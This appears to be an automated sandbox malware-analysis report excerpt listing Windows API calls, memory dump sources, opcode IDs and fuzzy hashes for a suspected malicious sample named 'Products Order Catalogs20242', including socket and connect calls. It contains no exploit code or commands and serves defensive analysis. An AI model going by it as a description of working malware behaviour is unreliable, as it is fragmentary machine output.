                                                                                                • Instruction Fuzzy Hash: 1821F87260430556E630EB15AC81BFBB3D8EBD0761F10483FEE4081280E67E9959D3AA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
                                                                                                • Instruction ID: 4734ce3ce40af5b77ad59fd8baedf6a3e56741e39cc50bb30d89ac3ca2d3bd52
                                                                                                • Opcode Fuzzy Hash: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
                                                                                                • Instruction Fuzzy Hash: 1321E0712006409BCB10EF29D994D6B73A8EF45321B40466EFE5597382DB34EC08CBA9
                                                                                                APIs
                                                                                                • IsWindowVisible.USER32(?), ref: 00445721
                                                                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0044573C
                                                                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00445773
                                                                                                • _wcslen.LIBCMT ref: 004457A3
                                                                                                • CharUpperBuffW.USER32(00000000,00000000), ref: 004457AD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                                                • String ID:
                                                                                                • API String ID: 3087257052-0
                                                                                                • Opcode ID: 07a683c3f77dae50ee773e7e3fa5154241049f7b31449e9a489b3be5124be6a3
                                                                                                • Instruction ID: 00e09c3d40749c53521e9302b0eb92bb7bfe2d7d521d01ead8474e6f611d5aec
                                                                                                • Opcode Fuzzy Hash: 07a683c3f77dae50ee773e7e3fa5154241049f7b31449e9a489b3be5124be6a3
                                                                                                • Instruction Fuzzy Hash: FA11E972601741BBF7105B35DC46F5B77CDAF65320F04443AF40AE6281FB69E84583AA
                                                                                                APIs
                                                                                                • IsWindow.USER32(00000000), ref: 00459DEF
                                                                                                • GetForegroundWindow.USER32 ref: 00459E07
                                                                                                • GetDC.USER32(00000000), ref: 00459E44
                                                                                                • GetPixel.GDI32(00000000,?,00000000), ref: 00459E4F
                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00459E8B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$ForegroundPixelRelease
                                                                                                • String ID:
                                                                                                • API String ID: 4156661090-0
                                                                                                • Opcode ID: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
                                                                                                • Instruction ID: f25aa70a507d7fb142791e963b89e5313ab4350e7ab13503248c443e15a863bf
                                                                                                • Opcode Fuzzy Hash: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
                                                                                                • Instruction Fuzzy Hash: 76219D76600202ABD700EFA5CD49A5AB7E9FF84315F19483DF90597642DB78FC04CBA9
                                                                                                APIs
                                                                                                  • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                                                                                                • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 00464985
                                                                                                • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,00000000), ref: 00464993
                                                                                                • connect.WSOCK32(00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649CD
                                                                                                • WSAGetLastError.WSOCK32(00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649F4
                                                                                                • closesocket.WSOCK32(00000000,00000000,00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 00464A07
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                                                • String ID:
                                                                                                • API String ID: 245547762-0
                                                                                                • Opcode ID: c11d93ef0e5925fc7b778e12926c76e847d2ba71e7f4531691fb5523561cfb0e
                                                                                                • Instruction ID: b27d5ee258410aac5bd3077dd9c53ce90635b59006b610d0ec7ee295a05cd03d
                                                                                                • Opcode Fuzzy Hash: c11d93ef0e5925fc7b778e12926c76e847d2ba71e7f4531691fb5523561cfb0e
                                                                                                • Instruction Fuzzy Hash: 3211DA712002109BD310FB2AC842F9BB3D8AF85728F04895FF594A72D2D7B9A885875A
                                                                                                APIs
                                                                                                • DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                • SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                • BeginPath.GDI32(?), ref: 004471B7
                                                                                                • SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Object$Select$BeginCreateDeletePath
                                                                                                • String ID:
                                                                                                • API String ID: 2338827641-0
                                                                                                • Opcode ID: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                                                                                                • Instruction ID: ab30216038401830d00444c504d41f25dcbf82a6e2307e0a418987ed8484b610
                                                                                                • Opcode Fuzzy Hash: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                                                                                                • Instruction Fuzzy Hash: 7E2171B18083019FD320CF29AD44A1B7FACF74A724F14052FF654933A1EB789849CB69
                                                                                                APIs
                                                                                                • Sleep.KERNEL32(00000000,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043771E
                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043773C
                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043775C
                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,004448B6,0000000F,?), ref: 00437767
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: CounterPerformanceQuerySleep
                                                                                                • String ID:
                                                                                                • API String ID: 2875609808-0
                                                                                                • Opcode ID: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                                                                                                • Instruction ID: fd8a8a83491f03de43ea78fbc63302b75a2fa5438857304713168bbc83ca9150
                                                                                                • Opcode Fuzzy Hash: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                                                                                                • Instruction Fuzzy Hash: EA11A3B64093119BC210EF1ADA88A8FB7F4FFD8765F004D2EF9C462250DB34D5598B9A
                                                                                                APIs
                                                                                                • SendMessageW.USER32 ref: 0046FD00
                                                                                                • SendMessageW.USER32(?,0000104C,00000000,?), ref: 0046FD2E
                                                                                                • SendMessageW.USER32(?,00001015,?,?), ref: 0046FD4B
                                                                                                • DestroyIcon.USER32(?), ref: 0046FD58
                                                                                                • DestroyIcon.USER32(?), ref: 0046FD5F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$DestroyIcon
                                                                                                • String ID:
                                                                                                • API String ID: 3419509030-0
                                                                                                • Opcode ID: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
                                                                                                • Instruction ID: ba7c1cc62690e465ab1dcb48fa3e0f79152c3dc78d34179caeeeb49ed344ab69
                                                                                                • Opcode Fuzzy Hash: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
                                                                                                • Instruction Fuzzy Hash: 5F1182B15043449BE730DF14DC46BABB7E8FBC5714F00492EE6C857291D6B8A84A8B67
                                                                                                APIs
                                                                                                • __getptd.LIBCMT ref: 004175AE
                                                                                                  • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
                                                                                                  • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
                                                                                                • __amsg_exit.LIBCMT ref: 004175CE
                                                                                                • __lock.LIBCMT ref: 004175DE
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004175FB
                                                                                                • InterlockedIncrement.KERNEL32(019A2CF8), ref: 00417626
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                • String ID:
                                                                                                • API String ID: 4271482742-0
                                                                                                • Opcode ID: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
                                                                                                • Instruction ID: de548182bd5f57d4f8c9f8a4c79293bfa6802d75d0085d2526eaa3c6a777046b
                                                                                                • Opcode Fuzzy Hash: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
                                                                                                • Instruction Fuzzy Hash: 9401AD31944A11AFC710ABA998497CE7BB0BB11724F0540ABE80063791CB3CA9C1CFEE
                                                                                                APIs
                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Destroy$DeleteObjectWindow$Icon
                                                                                                • String ID:
                                                                                                • API String ID: 4023252218-0
                                                                                                • Opcode ID: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                                                                • Instruction ID: d1816f9fa450f538fb043821254e2bd2cfb9ade9207d957631f6d0e9d50691b6
                                                                                                • Opcode Fuzzy Hash: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                                                                • Instruction Fuzzy Hash: 05015E70300605ABCB20DF65D9D4B2B77A8BF14712B50452AFD04D7346EB38EC48CB69
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00460342
                                                                                                • GetWindowTextW.USER32(00000000,00000100,00000100), ref: 00460357
                                                                                                • MessageBeep.USER32(00000000), ref: 0046036D
                                                                                                • KillTimer.USER32(?,0000040A), ref: 00460392
                                                                                                • EndDialog.USER32(?,00000001), ref: 004603AB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                • String ID:
                                                                                                • API String ID: 3741023627-0
                                                                                                • Opcode ID: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                                                                                • Instruction ID: 48c257e0c270193328064fa19c5b46d6a870d8092b70dfec968bdaebd9a60f08
                                                                                                • Opcode Fuzzy Hash: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                                                                                • Instruction Fuzzy Hash: BE018831500300A7E7209B54DE5DBDB77A8BF44B05F00492EB681A25D0E7F8A584CB55
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,00001101,00000000,?), ref: 00455514
                                                                                                • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                                                • String ID:
                                                                                                • API String ID: 1489400265-0
                                                                                                • Opcode ID: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                                                                                                • Instruction ID: 68d82c845863845e83b9d92669df32d5d1b96a6c2c0272d07869f65424c05900
                                                                                                • Opcode Fuzzy Hash: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                                                                                                • Instruction Fuzzy Hash: D9014F703006419BDB10EF65DED8A2A73A9FB44712B40455AFE05DB286DB78EC49CB68
                                                                                                APIs
                                                                                                  • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                                                • String ID:
                                                                                                • API String ID: 1042038666-0
                                                                                                • Opcode ID: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                                                                                                • Instruction ID: 707d1f3050e1f0ff98422ce5efa9f9a4d3559fdafbc0a23101ed238e91bf2869
                                                                                                • Opcode Fuzzy Hash: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                                                                                                • Instruction Fuzzy Hash: B2014B702006419BCB10AF65D9C8A2A33ACAF19322780456AFD05D7242DB28EC498B79
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                • String ID:
                                                                                                • API String ID: 2625713937-0
                                                                                                • Opcode ID: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                                                                                                • Instruction ID: 1b0d13c7bbaa275692c81ef4a4760df4fcf6218f807946f7e03cce85d1463269
                                                                                                • Opcode Fuzzy Hash: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                                                                                                • Instruction Fuzzy Hash: F7F0A4751052019BD7508F18EC0C70E7FA8FB4F325F04462EEA19932E0DB781546CBAD
                                                                                                APIs
                                                                                                  • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
                                                                                                • ___set_flsgetvalue.LIBCMT ref: 004140E1
                                                                                                  • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                                  • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                                  • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                                • ___fls_getvalue@4.LIBCMT ref: 004140EC
                                                                                                  • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                                • ___fls_setvalue@8.LIBCMT ref: 004140FF
                                                                                                  • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
                                                                                                • ExitThread.KERNEL32 ref: 0041410F
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00414115
                                                                                                • __freefls@4.LIBCMT ref: 00414135
                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                • String ID:
                                                                                                • API String ID: 132634196-0
                                                                                                • Opcode ID: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
                                                                                                • Instruction ID: c6f54ac6c47f72d6c6be617d0ab0d95393642b3a08ca47198428750b18cc63fb
                                                                                                • Opcode Fuzzy Hash: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
                                                                                                • Instruction Fuzzy Hash: EFE0B6318012096B8F0177F28E2A8DF3A2DAD56799B12842EBF10A3112DA6DD9D147AD
                                                                                                APIs
                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00415610
                                                                                                  • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
                                                                                                • __getptd_noexit.LIBCMT ref: 00415620
                                                                                                • CloseHandle.KERNEL32(?,?,0041566B), ref: 00415634
                                                                                                • __freeptd.LIBCMT ref: 0041563B
                                                                                                • ExitThread.KERNEL32 ref: 00415643
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseCurrentExitFindHandleImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                                                • String ID:
                                                                                                • API String ID: 3798957060-0
                                                                                                • Opcode ID: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
                                                                                                • Instruction ID: 5ad9b57b40d8b41da6f03c32f2a15b2799e0bbfe2e5ad1689210a27a588f1b2a
                                                                                                • Opcode Fuzzy Hash: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
                                                                                                • Instruction Fuzzy Hash: 29E01A31501A1197C2212BB9AC097DE3255AF01F36F944A6EF81A952A0DB6CD98147AD
                                                                                                APIs
                                                                                                  • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
                                                                                                • ___set_flsgetvalue.LIBCMT ref: 00415690
                                                                                                  • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                                  • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                                  • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
